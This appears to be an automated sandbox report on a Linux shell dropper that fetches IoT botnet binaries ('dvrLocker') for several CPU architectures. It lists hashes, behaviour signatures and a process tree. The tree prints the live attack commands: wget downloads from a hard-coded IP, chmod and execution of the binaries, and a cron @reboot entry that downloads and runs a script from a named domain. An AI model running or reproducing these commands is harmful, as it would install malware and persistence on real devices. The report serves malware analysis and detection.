Analysis
-
max time kernel
149s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 08:41
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
l.sh
-
Size
916B
-
MD5
19c4fe1b103747e55af818fc3f07fdbe
-
SHA1
ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
-
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
-
SHA512
2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodshchmodchmodpid process 816 chmod 820 chmod 833 chmod 783 chmod 789 chmod 798 chmod 800 sh 811 chmod 826 chmod -
Executes dropped EXE 8 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 784 dvrLocker /tmp/lib/dvrLocker 790 dvrLocker /tmp/lib/dvrLocker 799 dvrLocker /tmp/lib/dvrLocker 812 dvrLocker /tmp/lib/dvrLocker 817 dvrLocker /tmp/lib/dvrLocker 821 dvrLocker /tmp/lib/dvrLocker 828 dvrLocker /tmp/lib/dvrLocker 836 dvrLocker -
Renames itself 1 IoCs
Processes:
dvrLockerpid process 799 dvrLocker -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 152.53.15.127 Destination IP 168.235.111.72 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.x2KALa crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
Processes:
dvrLockerdescription ioc pid process Changes the process name, possibly in an attempt to hide itself mini_httpd 799 dvrLocker -
Processes:
lsdvrLockerlslslslslslslslslslslslslslslslscrontablslslslslslslslsmkdirlslslslslslscrontabdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/834/status dvrLocker File opened for reading /proc/860/status dvrLocker File opened for reading /proc/835/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/mounts dvrLocker File opened for reading /proc/841/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/868/status dvrLocker File opened for reading /proc/870/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/772/cmdline dvrLocker File opened for reading /proc/838/status dvrLocker File opened for reading /proc/843/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/827/status dvrLocker File opened for reading /proc/842/status dvrLocker File opened for reading /proc/869/status dvrLocker File opened for reading /proc/872/status dvrLocker File opened for reading /proc/874/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/805/cmdline dvrLocker File opened for reading /proc/829/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems crontab File opened for reading /proc/814/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/848/status dvrLocker File opened for reading /proc/861/cmdline dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/845/status dvrLocker File opened for reading /proc/852/status dvrLocker File opened for reading /proc/filesystems mkdir File opened for reading /proc/856/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/813/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/810/status dvrLocker File opened for reading /proc/1/cmdline dvrLocker File opened for reading /proc/865/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems crontab File opened for reading /proc/822/status dvrLocker File opened for reading /proc/826/status dvrLocker -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
l.shdescription ioc process File opened for modification /tmp/lib/dvrLocker l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:640 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:641 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:647 -
/bin/lsls -l /proc/106/exe2⤵
- Reads runtime system information
PID:651 -
/bin/lsls -l /proc/108/exe2⤵
- Reads runtime system information
PID:654 -
/bin/lsls -l /proc/109/exe2⤵
- Reads runtime system information
PID:657 -
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:660 -
/bin/lsls -l /proc/12/exe2⤵PID:664
-
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:667 -
/bin/lsls -l /proc/137/exe2⤵PID:668
-
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:671 -
/bin/lsls -l /proc/141/exe2⤵PID:673
-
/bin/lsls -l /proc/146/exe2⤵PID:676
-
/bin/lsls -l /proc/147/exe2⤵
- Reads runtime system information
PID:679 -
/bin/lsls -l /proc/15/exe2⤵PID:680
-
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:682 -
/bin/lsls -l /proc/167/exe2⤵
- Reads runtime system information
PID:683 -
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:685 -
/bin/lsls -l /proc/18/exe2⤵PID:686
-
/bin/lsls -l /proc/19/exe2⤵PID:687
-
/bin/lsls -l /proc/2/exe2⤵PID:688
-
/bin/lsls -l /proc/20/exe2⤵PID:689
-
/bin/lsls -l /proc/200/exe2⤵PID:690
-
/bin/lsls -l /proc/21/exe2⤵PID:691
-
/bin/lsls -l /proc/219/exe2⤵PID:692
-
/bin/lsls -l /proc/22/exe2⤵PID:693
-
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:694 -
/bin/lsls -l /proc/24/exe2⤵PID:695
-
/bin/lsls -l /proc/25/exe2⤵PID:696
-
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:697 -
/bin/lsls -l /proc/268/exe2⤵
- Reads runtime system information
PID:698 -
/bin/lsls -l /proc/269/exe2⤵PID:699
-
/bin/lsls -l /proc/27/exe2⤵PID:700
-
/bin/lsls -l /proc/271/exe2⤵PID:701
-
/bin/lsls -l /proc/273/exe2⤵PID:704
-
/bin/lsls -l /proc/274/exe2⤵PID:706
-
/bin/lsls -l /proc/28/exe2⤵
- Reads runtime system information
PID:708 -
/bin/lsls -l /proc/29/exe2⤵
- Reads runtime system information
PID:709 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:712 -
/bin/lsls -l /proc/305/exe2⤵PID:713
-
/bin/lsls -l /proc/308/exe2⤵
- Reads runtime system information
PID:716 -
/bin/lsls -l /proc/309/exe2⤵
- Reads runtime system information
PID:717 -
/bin/lsls -l /proc/321/exe2⤵
- Reads runtime system information
PID:719 -
/bin/lsls -l /proc/4/exe2⤵PID:721
-
/bin/lsls -l /proc/41/exe2⤵
- Reads runtime system information
PID:723 -
/bin/lsls -l /proc/42/exe2⤵
- Reads runtime system information
PID:725 -
/bin/lsls -l /proc/43/exe2⤵PID:727
-
/bin/lsls -l /proc/5/exe2⤵PID:728
-
/bin/lsls -l /proc/573/exe2⤵PID:730
-
/bin/lsls -l /proc/586/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/591/exe2⤵
- Reads runtime system information
PID:733 -
/bin/lsls -l /proc/593/exe2⤵
- Reads runtime system information
PID:735 -
/bin/lsls -l /proc/594/exe2⤵
- Reads runtime system information
PID:737 -
/bin/lsls -l /proc/6/exe2⤵PID:739
-
/bin/lsls -l /proc/625/exe2⤵
- Reads runtime system information
PID:741 -
/bin/lsls -l /proc/632/exe2⤵PID:742
-
/bin/lsls -l /proc/633/exe2⤵PID:744
-
/bin/lsls -l /proc/635/exe2⤵
- Reads runtime system information
PID:745 -
/bin/lsls -l /proc/637/exe2⤵PID:747
-
/bin/lsls -l /proc/638/exe2⤵
- Reads runtime system information
PID:749 -
/bin/lsls -l /proc/639/exe2⤵PID:751
-
/bin/lsls -l /proc/640/exe2⤵PID:753
-
/bin/lsls -l /proc/7/exe2⤵PID:754
-
/bin/lsls -l /proc/76/exe2⤵PID:757
-
/bin/lsls -l /proc/8/exe2⤵PID:760
-
/bin/lsls -l /proc/9/exe2⤵PID:761
-
/bin/lsls -l /proc/98/exe2⤵
- Reads runtime system information
PID:765 -
/bin/rmrm -rf /tmp/lib/2⤵PID:767
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:769
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:770 -
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:773
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:783 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:784 -
/bin/rmrm -rf mpsl2⤵PID:787
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:788 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:789 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:790 -
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:792 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:793
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:798 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:799 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:800 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:802 -
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:803 -
/bin/rmrm -rf arm2⤵PID:809
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:811 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:812 -
/bin/rmrm -rf arm52⤵PID:813
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:815
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:816 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:817 -
/bin/rmrm -rf ppc2⤵PID:818
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:819
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:820 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:821 -
/bin/rmrm -rf arm72⤵PID:823
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:824
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:826 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:828 -
/bin/rmrm -rf arm62⤵PID:830
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:831
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:833 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:836 -
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:839
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
306B
MD5c8f52a3f659ca7c7be0a52692aa80acb
SHA11e01d51afb31de66a9a6896f490cbdc600d6fbb2
SHA2560c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10
SHA5129c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f